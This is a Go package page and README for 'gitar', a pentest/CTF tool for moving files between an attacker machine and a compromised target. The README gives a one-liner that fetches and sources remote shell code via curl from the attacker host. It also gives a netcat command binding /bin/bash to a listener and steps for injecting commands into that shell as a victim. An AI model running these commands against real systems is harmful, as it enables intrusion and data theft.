gitar

command module

v1.1.0 Latest Latest Go to latest Published: Mar 14, 2022 License: Unlicense Imports: 14 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/ariary/gitar

Links

Open Source Insights

README ¶

gitar

📡 A more sophisticated python HTTP server sibling
🎸 with even simpler interactions for file exchange (Pentest/CTF)


~> Have the simplest possible shortcuts to upload/download file to/from the target machine ~> No installation needed on target machine ~> Fast and simple deployment

TL;DR - and listen music

On my target machine:

Download a file from my attacker machine: pull [file]
Download a directory from my attacker machine: pullr [directory]
Upload a file to my attacker machine: push [file]
Upload a directory to my attacker machine: pushr [directory]

Before be able to use these shortcut you have to set up both machines. Once again, the aim is to made it as simple as possible

Set up

~> To make set up even simpler shortcut/aliases are a great benefit. See them 💥

Pre-requisites

HTTP Network connectivity between attacker & target machines
On target machine: curl
- tar for directory upload
On attacker machine:
- xclip to copy command on clipboard (not required)
- tree: to expose it trough server (not required)
- dig: to automatically find extarnal IP (not required)

The aim is to keep "target requirements" as fit as possible. Attacker machine requirements are not a big deal as we have plenty control over it and time to configure it.

🎸 Launch `gitar` server

On Attacker machine:

gitar

On Target machine:

# Get shortcuts and source them. The one-liner corresponding is by default copy on clipboard. 
# It is also provided by step 1. (in gitar output):
source <(curl -s http://[attacker_ip:port]/alias)

And that's all, you can now push or pull file 🎶

^{with 💥}

🐋 Secure launch of `gitar` server

This is basicaly the same as launching gitar server. But as we expose our http server we become the prey. Hence we must harden a bit the server. To do this we launch gitar inside a container and use HTTPS.

To use container image, you have to built it from Dockerfile: make build.gitar.image

The following steps expose files of current directory. Files uploaded by remote are written inside current directory also.

On Attacker machine:

docker run -it --rm --cap-drop=all --cap-add=dac_override --user $(id -u):$(id -g)  -v "${PWD}:/gitar/exchange" ariary/gitar

You can now pushor pull file being more safe 🎶

^{with 💥}

Install

go install github.com/ariary/gitar@latest

Bonus

Load shortcut directly in your reverse shell

~> Below are the steps to have shortcuts directly embedded in your nc reverse shell

On Target machine:

# Launch your classic listener
nc -nvlp 4444 -e /bin/bash

On Attacker machine:

Launch gitarserver : gitar -e [server_reachable_ip] (By default this will copy on clipboard the command to set up gitar exchange, also available in server output)
Connect to the reverse shell + load shortcut within:nc [VICTIM_IP] 4444 then [CTRL+V]

An alternative is export CMD=[CTRL+V] && (echo $CMD && cat) | nc [VICTIM_IP] 4444 (Note: with cat you will not benefit of bash completion)

And enjoy you revshell 🎶